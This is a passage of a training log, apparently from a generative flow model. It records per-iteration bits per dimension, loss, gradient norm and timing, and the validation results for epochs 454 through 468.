440(442.06) | Grad Norm 0.0672(0.0800) | Total Time 10.00(10.00)\nIter 5150 | Time 41.0518(40.4440) | Bit/dim 1.0714(1.0766) | Xent 0.0000(0.0000) | Loss 1.0714(1.0766) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0985(0.0806) | Total Time 10.00(10.00)\nIter 5151 | Time 40.6164(40.4492) | Bit/dim 1.0806(1.0767) | Xent 0.0000(0.0000) | Loss 1.0806(1.0767) | Error 0.0000(0.0000) Steps 446(442.12) | Grad Norm 0.1092(0.0814) | Total Time 10.00(10.00)\nIter 5152 | Time 39.7168(40.4272) | Bit/dim 1.0742(1.0767) | Xent 0.0000(0.0000) | Loss 1.0742(1.0767) | Error 0.0000(0.0000) Steps 440(442.06) | Grad Norm 0.0550(0.0807) | Total Time 10.00(10.00)\nIter 5153 | Time 39.9483(40.4128) | Bit/dim 1.0807(1.0768) | Xent 0.0000(0.0000) | Loss 1.0807(1.0768) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0592(0.0800) | Total Time 10.00(10.00)\nIter 5154 | Time 38.8754(40.3667) | Bit/dim 1.0762(1.0768) | Xent 0.0000(0.0000) | Loss 1.0762(1.0768) | Error 0.0000(0.0000) Steps 446(442.12) | Grad Norm 0.0922(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0454 | Time 14.7099, Epoch Time 307.9974(310.1136), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5155 | Time 40.3221(40.3654) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 446(442.23) | Grad Norm 0.0607(0.0798) | Total Time 10.00(10.00)\nIter 5156 | Time 39.9141(40.3518) | Bit/dim 1.0745(1.0767) | Xent 0.0000(0.0000) | Loss 1.0745(1.0767) | Error 0.0000(0.0000) Steps 446(442.35) | Grad Norm 0.0691(0.0795) | Total Time 10.00(10.00)\nIter 5157 | Time 39.1238(40.3150) | Bit/dim 1.0708(1.0765) | Xent 0.0000(0.0000) | Loss 1.0708(1.0765) | Error 0.0000(0.0000) Steps 446(442.45) | Grad Norm 0.0811(0.0795) | Total Time 10.00(10.00)\nIter 5158 | Time 40.8218(40.3302) | Bit/dim 1.0809(1.0766) | Xent 0.0000(0.0000) | Loss 1.0809(1.0766) | Error 0.0000(0.0000) Steps 446(442.56) | Grad Norm 0.0983(0.0801) | Total Time 10.00(10.00)\nIter 5159 | Time 40.5228(40.3360) | Bit/dim 1.0767(1.0766) | Xent 0.0000(0.0000) | Loss 1.0767(1.0766) | Error 0.0000(0.0000) Steps 440(442.48) | Grad Norm 0.0877(0.0803) | Total Time 10.00(10.00)\nIter 5160 | Time 40.1532(40.3305) | Bit/dim 1.0785(1.0767) | Xent 0.0000(0.0000) | Loss 1.0785(1.0767) | Error 0.0000(0.0000) Steps 446(442.59) | Grad Norm 0.1132(0.0813) | Total Time 10.00(10.00)\nIter 5161 | Time 41.9152(40.3780) | Bit/dim 1.0789(1.0768) | Xent 0.0000(0.0000) | Loss 1.0789(1.0768) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0850(0.0814) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0455 | Time 14.9648, Epoch Time 310.0775(310.1125), Bit/dim 1.0711(best: 1.0712), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5162 | Time 40.1386(40.3709) | Bit/dim 1.0714(1.0766) | Xent 0.0000(0.0000) | Loss 1.0714(1.0766) | Error 0.0000(0.0000) Steps 440(442.44) | Grad Norm 0.0544(0.0806) | Total Time 10.00(10.00)\nIter 5163 | Time 39.4101(40.3420) | Bit/dim 1.0804(1.0767) | Xent 0.0000(0.0000) | Loss 1.0804(1.0767) | Error 0.0000(0.0000) Steps 446(442.54) | Grad Norm 0.0543(0.0798) | Total Time 10.00(10.00)\nIter 5164 | Time 40.9828(40.3613) | Bit/dim 1.0755(1.0767) | Xent 0.0000(0.0000) | Loss 1.0755(1.0767) | Error 0.0000(0.0000) Steps 440(442.47) | Grad Norm 0.0670(0.0794) | Total Time 10.00(10.00)\nIter 5165 | Time 40.7401(40.3726) | Bit/dim 1.0729(1.0766) | Xent 0.0000(0.0000) | Loss 1.0729(1.0766) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0865(0.0796) | Total Time 10.00(10.00)\nIter 5166 | Time 40.5305(40.3774) | Bit/dim 1.0807(1.0767) | Xent 0.0000(0.0000) | Loss 1.0807(1.0767) | Error 0.0000(0.0000) Steps 446(442.50) | Grad Norm 0.0716(0.0794) | Total Time 10.00(10.00)\nIter 5167 | Time 41.0611(40.3979) | Bit/dim 1.0777(1.0767) | Xent 0.0000(0.0000) | Loss 1.0777(1.0767) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0853(0.0796) | Total Time 10.00(10.00)\nIter 5168 | Time 41.7964(40.4398) | Bit/dim 1.0779(1.0768) | Xent 0.0000(0.0000) | Loss 1.0779(1.0768) | Error 0.0000(0.0000) Steps 446(442.53) | Grad Norm 0.0930(0.0800) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0456 | Time 15.1593, Epoch Time 312.2156(310.1756), Bit/dim 1.0714(best: 1.0711), Xent 0.0000, Loss 1.0714, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5169 | Time 38.7103(40.3879) | Bit/dim 1.0791(1.0768) | Xent 0.0000(0.0000) | Loss 1.0791(1.0768) | Error 0.0000(0.0000) Steps 440(442.46) | Grad Norm 0.0531(0.0792) | Total Time 10.00(10.00)\nIter 5170 | Time 38.8005(40.3403) | Bit/dim 1.0771(1.0768) | Xent 0.0000(0.0000) | Loss 1.0771(1.0768) | Error 0.0000(0.0000) Steps 440(442.38) | Grad Norm 0.1294(0.0807) | Total Time 10.00(10.00)\nIter 5171 | Time 41.4595(40.3739) | Bit/dim 1.0786(1.0769) | Xent 0.0000(0.0000) | Loss 1.0786(1.0769) | Error 0.0000(0.0000) Steps 440(442.31) | Grad Norm 0.0822(0.0807) | Total Time 10.00(10.00)\nIter 5172 | Time 41.2354(40.3997) | Bit/dim 1.0756(1.0768) | Xent 0.0000(0.0000) | Loss 1.0756(1.0768) | Error 0.0000(0.0000) Steps 446(442.42) | Grad Norm 0.0601(0.0801) | Total Time 10.00(10.00)\nIter 5173 | Time 39.7153(40.3792) | Bit/dim 1.0777(1.0769) | Xent 0.0000(0.0000) | Loss 1.0777(1.0769) | Error 0.0000(0.0000) Steps 446(442.53) | Grad Norm 0.1075(0.0809) | Total Time 10.00(10.00)\nIter 5174 | Time 40.3360(40.3779) | Bit/dim 1.0731(1.0768) | Xent 0.0000(0.0000) | Loss 1.0731(1.0768) | Error 0.0000(0.0000) Steps 440(442.45) | Grad Norm 0.0670(0.0805) | Total Time 10.00(10.00)\nIter 5175 | Time 40.0905(40.3693) | Bit/dim 1.0753(1.0767) | Xent 0.0000(0.0000) | Loss 1.0753(1.0767) | Error 0.0000(0.0000) Steps 446(442.56) | Grad Norm 0.0702(0.0802) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0457 | Time 14.8440, Epoch Time 307.8577(310.1060), Bit/dim 1.0716(best: 1.0711), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5176 | Time 39.7408(40.3504) | Bit/dim 1.0788(1.0768) | Xent 0.0000(0.0000) | Loss 1.0788(1.0768) | Error 0.0000(0.0000) Steps 446(442.66) | Grad Norm 0.0603(0.0796) | Total Time 10.00(10.00)\nIter 5177 | Time 41.9020(40.3970) | Bit/dim 1.0783(1.0768) | Xent 0.0000(0.0000) | Loss 1.0783(1.0768) | Error 0.0000(0.0000) Steps 446(442.76) | Grad Norm 0.1101(0.0805) | Total Time 10.00(10.00)\nIter 5178 | Time 40.6001(40.4031) | Bit/dim 1.0800(1.0769) | Xent 0.0000(0.0000) | Loss 1.0800(1.0769) | Error 0.0000(0.0000) Steps 446(442.86) | Grad Norm 0.0583(0.0798) | Total Time 10.00(10.00)\nIter 5179 | Time 39.9001(40.3880) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 446(442.96) | Grad Norm 0.0688(0.0795) | Total Time 10.00(10.00)\nIter 5180 | Time 41.8493(40.4318) | Bit/dim 1.0747(1.0768) | Xent 0.0000(0.0000) | Loss 1.0747(1.0768) | Error 0.0000(0.0000) Steps 440(442.87) | Grad Norm 0.0816(0.0796) | Total Time 10.00(10.00)\nIter 5181 | Time 42.0564(40.4806) | Bit/dim 1.0729(1.0767) | Xent 0.0000(0.0000) | Loss 1.0729(1.0767) | Error 0.0000(0.0000) Steps 446(442.96) | Grad Norm 0.0722(0.0794) | Total Time 10.00(10.00)\nIter 5182 | Time 40.9104(40.4935) | Bit/dim 1.0723(1.0766) | Xent 0.0000(0.0000) | Loss 1.0723(1.0766) | Error 0.0000(0.0000) Steps 440(442.87) | Grad Norm 0.0832(0.0795) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0458 | Time 14.8726, Epoch Time 314.6576(310.2426), Bit/dim 1.0711(best: 1.0711), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5183 | Time 40.4145(40.4911) | Bit/dim 1.0753(1.0765) | Xent 0.0000(0.0000) | Loss 1.0753(1.0765) | Error 0.0000(0.0000) Steps 440(442.79) | Grad Norm 0.0817(0.0795) | Total Time 10.00(10.00)\nIter 5184 | Time 39.4902(40.4611) | Bit/dim 1.0730(1.0764) | Xent 0.0000(0.0000) | Loss 1.0730(1.0764) | Error 0.0000(0.0000) Steps 440(442.70) | Grad Norm 0.0621(0.0790) | Total Time 10.00(10.00)\nIter 5185 | Time 38.9384(40.4154) | Bit/dim 1.0758(1.0764) | Xent 0.0000(0.0000) | Loss 1.0758(1.0764) | Error 0.0000(0.0000) Steps 440(442.62) | Grad Norm 0.0628(0.0785) | Total Time 10.00(10.00)\nIter 5186 | Time 39.1061(40.3761) | Bit/dim 1.0769(1.0764) | Xent 0.0000(0.0000) | Loss 1.0769(1.0764) | Error 0.0000(0.0000) Steps 440(442.54) | Grad Norm 0.0908(0.0789) | Total Time 10.00(10.00)\nIter 5187 | Time 38.8842(40.3313) | Bit/dim 1.0816(1.0766) | Xent 0.0000(0.0000) | Loss 1.0816(1.0766) | Error 0.0000(0.0000) Steps 446(442.65) | Grad Norm 0.0699(0.0786) | Total Time 10.00(10.00)\nIter 5188 | Time 41.2929(40.3602) | Bit/dim 1.0741(1.0765) | Xent 0.0000(0.0000) | Loss 1.0741(1.0765) | Error 0.0000(0.0000) Steps 446(442.75) | Grad Norm 0.0560(0.0779) | Total Time 10.00(10.00)\nIter 5189 | Time 41.7675(40.4024) | Bit/dim 1.0772(1.0765) | Xent 0.0000(0.0000) | Loss 1.0772(1.0765) | Error 0.0000(0.0000) Steps 440(442.66) | Grad Norm 0.0619(0.0775) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0459 | Time 14.9091, Epoch Time 307.1357(310.1494), Bit/dim 1.0712(best: 1.0711), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5190 | Time 41.2381(40.4275) | Bit/dim 1.0729(1.0764) | Xent 0.0000(0.0000) | Loss 1.0729(1.0764) | Error 0.0000(0.0000) Steps 440(442.58) | Grad Norm 0.1065(0.0783) | Total Time 10.00(10.00)\nIter 5191 | Time 41.7265(40.4664) | Bit/dim 1.0805(1.0765) | Xent 0.0000(0.0000) | Loss 1.0805(1.0765) | Error 0.0000(0.0000) Steps 446(442.69) | Grad Norm 0.0510(0.0775) | Total Time 10.00(10.00)\nIter 5192 | Time 40.3864(40.4640) | Bit/dim 1.0723(1.0764) | Xent 0.0000(0.0000) | Loss 1.0723(1.0764) | Error 0.0000(0.0000) Steps 446(442.79) | Grad Norm 0.0874(0.0778) | Total Time 10.00(10.00)\nIter 5193 | Time 39.5209(40.4358) | Bit/dim 1.0784(1.0765) | Xent 0.0000(0.0000) | Loss 1.0784(1.0765) | Error 0.0000(0.0000) Steps 440(442.70) | Grad Norm 0.0884(0.0781) | Total Time 10.00(10.00)\nIter 5194 | Time 38.5992(40.3807) | Bit/dim 1.0752(1.0764) | Xent 0.0000(0.0000) | Loss 1.0752(1.0764) | Error 0.0000(0.0000) Steps 440(442.62) | Grad Norm 0.0676(0.0778) | Total Time 10.00(10.00)\nIter 5195 | Time 39.7086(40.3605) | Bit/dim 1.0745(1.0764) | Xent 0.0000(0.0000) | Loss 1.0745(1.0764) | Error 0.0000(0.0000) Steps 446(442.72) | Grad Norm 0.0811(0.0779) | Total Time 10.00(10.00)\nIter 5196 | Time 41.3600(40.3905) | Bit/dim 1.0786(1.0764) | Xent 0.0000(0.0000) | Loss 1.0786(1.0764) | Error 0.0000(0.0000) Steps 440(442.64) | Grad Norm 0.0642(0.0775) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0460 | Time 14.7616, Epoch Time 310.0542(310.1465), Bit/dim 1.0714(best: 1.0711), Xent 0.0000, Loss 1.0714, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5197 | Time 40.4559(40.3924) | Bit/dim 1.0750(1.0764) | Xent 0.0000(0.0000) | Loss 1.0750(1.0764) | Error 0.0000(0.0000) Steps 440(442.56) | Grad Norm 0.0757(0.0774) | Total Time 10.00(10.00)\nIter 5198 | Time 41.4122(40.4230) | Bit/dim 1.0802(1.0765) | Xent 0.0000(0.0000) | Loss 1.0802(1.0765) | Error 0.0000(0.0000) Steps 446(442.67) | Grad Norm 0.0670(0.0771) | Total Time 10.00(10.00)\nIter 5199 | Time 39.0452(40.3817) | Bit/dim 1.0761(1.0765) | Xent 0.0000(0.0000) | Loss 1.0761(1.0765) | Error 0.0000(0.0000) Steps 440(442.59) | Grad Norm 0.0591(0.0766) | Total Time 10.00(10.00)\nIter 5200 | Time 40.1472(40.3747) | Bit/dim 1.0805(1.0766) | Xent 0.0000(0.0000) | Loss 1.0805(1.0766) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.1112(0.0776) | Total Time 10.00(10.00)\nIter 5201 | Time 40.7721(40.3866) | Bit/dim 1.0740(1.0765) | Xent 0.0000(0.0000) | Loss 1.0740(1.0765) | Error 0.0000(0.0000) Steps 446(442.61) | Grad Norm 0.0602(0.0771) | Total Time 10.00(10.00)\nIter 5202 | Time 41.5559(40.4217) | Bit/dim 1.0727(1.0764) | Xent 0.0000(0.0000) | Loss 1.0727(1.0764) | Error 0.0000(0.0000) Steps 446(442.71) | Grad Norm 0.0554(0.0765) | Total Time 10.00(10.00)\nIter 5203 | Time 42.7653(40.4920) | Bit/dim 1.0766(1.0764) | Xent 0.0000(0.0000) | Loss 1.0766(1.0764) | Error 0.0000(0.0000) Steps 446(442.81) | Grad Norm 0.0854(0.0767) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0461 | Time 14.9113, Epoch Time 313.6441(310.2514), Bit/dim 1.0706(best: 1.0711), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5204 | Time 39.6084(40.4655) | Bit/dim 1.0712(1.0763) | Xent 0.0000(0.0000) | Loss 1.0712(1.0763) | Error 0.0000(0.0000) Steps 440(442.73) | Grad Norm 0.0743(0.0766) | Total Time 10.00(10.00)\nIter 5205 | Time 40.3098(40.4608) | Bit/dim 1.0821(1.0764) | Xent 0.0000(0.0000) | Loss 1.0821(1.0764) | Error 0.0000(0.0000) Steps 440(442.65) | Grad Norm 0.0608(0.0762) | Total Time 10.00(10.00)\nIter 5206 | Time 39.7130(40.4384) | Bit/dim 1.0771(1.0765) | Xent 0.0000(0.0000) | Loss 1.0771(1.0765) | Error 0.0000(0.0000) Steps 446(442.75) | Grad Norm 0.0884(0.0765) | Total Time 10.00(10.00)\nIter 5207 | Time 40.0072(40.4254) | Bit/dim 1.0771(1.0765) | Xent 0.0000(0.0000) | Loss 1.0771(1.0765) | Error 0.0000(0.0000) Steps 440(442.66) | Grad Norm 0.0721(0.0764) | Total Time 10.00(10.00)\nIter 5208 | Time 42.0931(40.4755) | Bit/dim 1.0723(1.0764) | Xent 0.0000(0.0000) | Loss 1.0723(1.0764) | Error 0.0000(0.0000) Steps 440(442.58) | Grad Norm 0.0741(0.0763) | Total Time 10.00(10.00)\nIter 5209 | Time 40.2741(40.4694) | Bit/dim 1.0733(1.0763) | Xent 0.0000(0.0000) | Loss 1.0733(1.0763) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0582(0.0758) | Total Time 10.00(10.00)\nIter 5210 | Time 39.1020(40.4284) | Bit/dim 1.0792(1.0764) | Xent 0.0000(0.0000) | Loss 1.0792(1.0764) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0869(0.0761) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0462 | Time 15.0026, Epoch Time 308.4534(310.1975), Bit/dim 1.0716(best: 1.0706), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5211 | Time 39.7311(40.4075) | Bit/dim 1.0772(1.0764) | Xent 0.0000(0.0000) | Loss 1.0772(1.0764) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0646(0.0758) | Total Time 10.00(10.00)\nIter 5212 | Time 38.9679(40.3643) | Bit/dim 1.0774(1.0764) | Xent 0.0000(0.0000) | Loss 1.0774(1.0764) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0966(0.0764) | Total Time 10.00(10.00)\nIter 5213 | Time 40.5426(40.3696) | Bit/dim 1.0741(1.0763) | Xent 0.0000(0.0000) | Loss 1.0741(1.0763) | Error 0.0000(0.0000) Steps 446(442.40) | Grad Norm 0.0619(0.0760) | Total Time 10.00(10.00)\nIter 5214 | Time 41.9483(40.4170) | Bit/dim 1.0749(1.0763) | Xent 0.0000(0.0000) | Loss 1.0749(1.0763) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.0858(0.0763) | Total Time 10.00(10.00)\nIter 5215 | Time 39.4759(40.3888) | Bit/dim 1.0761(1.0763) | Xent 0.0000(0.0000) | Loss 1.0761(1.0763) | Error 0.0000(0.0000) Steps 446(442.44) | Grad Norm 0.1346(0.0780) | Total Time 10.00(10.00)\nIter 5216 | Time 39.9341(40.3751) | Bit/dim 1.0788(1.0764) | Xent 0.0000(0.0000) | Loss 1.0788(1.0764) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0953(0.0785) | Total Time 10.00(10.00)\nIter 5217 | Time 41.9022(40.4209) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 446(442.47) | Grad Norm 0.0702(0.0783) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0463 | Time 14.8826, Epoch Time 309.8397(310.1868), Bit/dim 1.0709(best: 1.0706), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5218 | Time 41.2565(40.4460) | Bit/dim 1.0782(1.0764) | Xent 0.0000(0.0000) | Loss 1.0782(1.0764) | Error 0.0000(0.0000) Steps 440(442.40) | Grad Norm 0.1011(0.0790) | Total Time 10.00(10.00)\nIter 5219 | Time 42.0132(40.4930) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.1186(0.0802) | Total Time 10.00(10.00)\nIter 5220 | Time 40.4381(40.4914) | Bit/dim 1.0719(1.0762) | Xent 0.0000(0.0000) | Loss 1.0719(1.0762) | Error 0.0000(0.0000) Steps 440(442.26) | Grad Norm 0.0867(0.0804) | Total Time 10.00(10.00)\nIter 5221 | Time 40.0876(40.4793) | Bit/dim 1.0758(1.0762) | Xent 0.0000(0.0000) | Loss 1.0758(1.0762) | Error 0.0000(0.0000) Steps 446(442.37) | Grad Norm 0.0779(0.0803) | Total Time 10.00(10.00)\nIter 5222 | Time 40.4877(40.4795) | Bit/dim 1.0762(1.0762) | Xent 0.0000(0.0000) | Loss 1.0762(1.0762) | Error 0.0000(0.0000) Steps 440(442.30) | Grad Norm 0.1260(0.0817) | Total Time 10.00(10.00)\nIter 5223 | Time 41.6267(40.5139) | Bit/dim 1.0758(1.0762) | Xent 0.0000(0.0000) | Loss 1.0758(1.0762) | Error 0.0000(0.0000) Steps 446(442.41) | Grad Norm 0.1040(0.0823) | Total Time 10.00(10.00)\nIter 5224 | Time 39.0718(40.4707) | Bit/dim 1.0765(1.0762) | Xent 0.0000(0.0000) | Loss 1.0765(1.0762) | Error 0.0000(0.0000) Steps 440(442.34) | Grad Norm 0.1217(0.0835) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0464 | Time 14.9087, Epoch Time 312.3863(310.2528), Bit/dim 1.0711(best: 1.0706), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5225 | Time 38.7320(40.4185) | Bit/dim 1.0790(1.0763) | Xent 0.0000(0.0000) | Loss 1.0790(1.0763) | Error 0.0000(0.0000) Steps 440(442.27) | Grad Norm 0.0489(0.0825) | Total Time 10.00(10.00)\nIter 5226 | Time 41.6483(40.4554) | Bit/dim 1.0767(1.0763) | Xent 0.0000(0.0000) | Loss 1.0767(1.0763) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.1016(0.0830) | Total Time 10.00(10.00)\nIter 5227 | Time 42.1392(40.5059) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0980(0.0835) | Total Time 10.00(10.00)\nIter 5228 | Time 41.4990(40.5357) | Bit/dim 1.0770(1.0763) | Xent 0.0000(0.0000) | Loss 1.0770(1.0763) | Error 0.0000(0.0000) Steps 446(442.25) | Grad Norm 0.0752(0.0832) | Total Time 10.00(10.00)\nIter 5229 | Time 41.3522(40.5602) | Bit/dim 1.0758(1.0763) | Xent 0.0000(0.0000) | Loss 1.0758(1.0763) | Error 0.0000(0.0000) Steps 440(442.18) | Grad Norm 0.0715(0.0829) | Total Time 10.00(10.00)\nIter 5230 | Time 39.6940(40.5342) | Bit/dim 1.0750(1.0762) | Xent 0.0000(0.0000) | Loss 1.0750(1.0762) | Error 0.0000(0.0000) Steps 446(442.30) | Grad Norm 0.0586(0.0822) | Total Time 10.00(10.00)\nIter 5231 | Time 40.9046(40.5453) | Bit/dim 1.0750(1.0762) | Xent 0.0000(0.0000) | Loss 1.0750(1.0762) | Error 0.0000(0.0000) Steps 440(442.23) | Grad Norm 0.1210(0.0833) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0465 | Time 14.8502, Epoch Time 313.1535(310.3398), Bit/dim 1.0707(best: 1.0706), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5232 | Time 39.1290(40.5028) | Bit/dim 1.0760(1.0762) | Xent 0.0000(0.0000) | Loss 1.0760(1.0762) | Error 0.0000(0.0000) Steps 440(442.16) | Grad Norm 0.0507(0.0823) | Total Time 10.00(10.00)\nIter 5233 | Time 41.7095(40.5390) | Bit/dim 1.0782(1.0762) | Xent 0.0000(0.0000) | Loss 1.0782(1.0762) | Error 0.0000(0.0000) Steps 440(442.10) | Grad Norm 0.0752(0.0821) | Total Time 10.00(10.00)\nIter 5234 | Time 41.6052(40.5710) | Bit/dim 1.0747(1.0762) | Xent 0.0000(0.0000) | Loss 1.0747(1.0762) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.0726(0.0818) | Total Time 10.00(10.00)\nIter 5235 | Time 40.4893(40.5686) | Bit/dim 1.0822(1.0764) | Xent 0.0000(0.0000) | Loss 1.0822(1.0764) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1771(0.0847) | Total Time 10.00(10.00)\nIter 5236 | Time 39.4491(40.5350) | Bit/dim 1.0729(1.0763) | Xent 0.0000(0.0000) | Loss 1.0729(1.0763) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0651(0.0841) | Total Time 10.00(10.00)\nIter 5237 | Time 39.2683(40.4970) | Bit/dim 1.0769(1.0763) | Xent 0.0000(0.0000) | Loss 1.0769(1.0763) | Error 0.0000(0.0000) Steps 446(442.04) | Grad Norm 0.0980(0.0845) | Total Time 10.00(10.00)\nIter 5238 | Time 41.2818(40.5205) | Bit/dim 1.0713(1.0761) | Xent 0.0000(0.0000) | Loss 1.0713(1.0761) | Error 0.0000(0.0000) Steps 446(442.15) | Grad Norm 0.1488(0.0865) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0466 | Time 15.0413, Epoch Time 310.5079(310.3448), Bit/dim 1.0710(best: 1.0706), Xent 0.0000, Loss 1.0710, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5239 | Time 40.2253(40.5117) | Bit/dim 1.0813(1.0763) | Xent 0.0000(0.0000) | Loss 1.0813(1.0763) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0557(0.0855) | Total Time 10.00(10.00)\nIter 5240 | Time 39.4263(40.4791) | Bit/dim 1.0735(1.0762) | Xent 0.0000(0.0000) | Loss 1.0735(1.0762) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.1135(0.0864) | Total Time 10.00(10.00)\nIter 5241 | Time 41.1161(40.4982) | Bit/dim 1.0746(1.0762) | Xent 0.0000(0.0000) | Loss 1.0746(1.0762) | Error 0.0000(0.0000) Steps 440(442.14) | Grad Norm 0.0596(0.0856) | Total Time 10.00(10.00)\nIter 5242 | Time 41.9630(40.5422) | Bit/dim 1.0748(1.0761) | Xent 0.0000(0.0000) | Loss 1.0748(1.0761) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0674(0.0850) | Total Time 10.00(10.00)\nIter 5243 | Time 40.4541(40.5395) | Bit/dim 1.0727(1.0760) | Xent 0.0000(0.0000) | Loss 1.0727(1.0760) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.0628(0.0844) | Total Time 10.00(10.00)\nIter 5244 | Time 40.5763(40.5406) | Bit/dim 1.0770(1.0760) | Xent 0.0000(0.0000) | Loss 1.0770(1.0760) | Error 0.0000(0.0000) Steps 446(442.30) | Grad Norm 0.0665(0.0838) | Total Time 10.00(10.00)\nIter 5245 | Time 41.3391(40.5646) | Bit/dim 1.0789(1.0761) | Xent 0.0000(0.0000) | Loss 1.0789(1.0761) | Error 0.0000(0.0000) Steps 440(442.23) | Grad Norm 0.0693(0.0834) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0467 | Time 14.6494, Epoch Time 312.4349(310.4075), Bit/dim 1.0711(best: 1.0706), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5246 | Time 40.1634(40.5525) | Bit/dim 1.0771(1.0762) | Xent 0.0000(0.0000) | Loss 1.0771(1.0762) | Error 0.0000(0.0000) Steps 440(442.17) | Grad Norm 0.0706(0.0830) | Total Time 10.00(10.00)\nIter 5247 | Time 38.9919(40.5057) | Bit/dim 1.0771(1.0762) | Xent 0.0000(0.0000) | Loss 1.0771(1.0762) | Error 0.0000(0.0000) Steps 446(442.28) | Grad Norm 0.0499(0.0820) | Total Time 10.00(10.00)\nIter 5248 | Time 40.0554(40.4922) | Bit/dim 1.0742(1.0761) | Xent 0.0000(0.0000) | Loss 1.0742(1.0761) | Error 0.0000(0.0000) Steps 440(442.21) | Grad Norm 0.0567(0.0812) | Total Time 10.00(10.00)\nIter 5249 | Time 41.2076(40.5137) | Bit/dim 1.0775(1.0762) | Xent 0.0000(0.0000) | Loss 1.0775(1.0762) | Error 0.0000(0.0000) Steps 446(442.33) | Grad Norm 0.0631(0.0807) | Total Time 10.00(10.00)\nIter 5250 | Time 40.7589(40.5210) | Bit/dim 1.0778(1.0762) | Xent 0.0000(0.0000) | Loss 1.0778(1.0762) | Error 0.0000(0.0000) Steps 446(442.44) | Grad Norm 0.0680(0.0803) | Total Time 10.00(10.00)\nIter 5251 | Time 39.7445(40.4977) | Bit/dim 1.0739(1.0762) | Xent 0.0000(0.0000) | Loss 1.0739(1.0762) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0642(0.0798) | Total Time 10.00(10.00)\nIter 5252 | Time 40.4295(40.4957) | Bit/dim 1.0755(1.0761) | Xent 0.0000(0.0000) | Loss 1.0755(1.0761) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0615(0.0793) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0468 | Time 14.9079, Epoch Time 308.6603(310.3551), Bit/dim 1.0705(best: 1.0706), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5253 | Time 39.9700(40.4799) | Bit/dim 1.0740(1.0761) | Xent 0.0000(0.0000) | Loss 1.0740(1.0761) | Error 0.0000(0.0000) Steps 440(442.22) | Grad Norm 0.0605(0.0787) | Total Time 10.00(10.00)\nIter 5254 | Time 42.4206(40.5381) | Bit/dim 1.0738(1.0760) | Xent 0.0000(0.0000) | 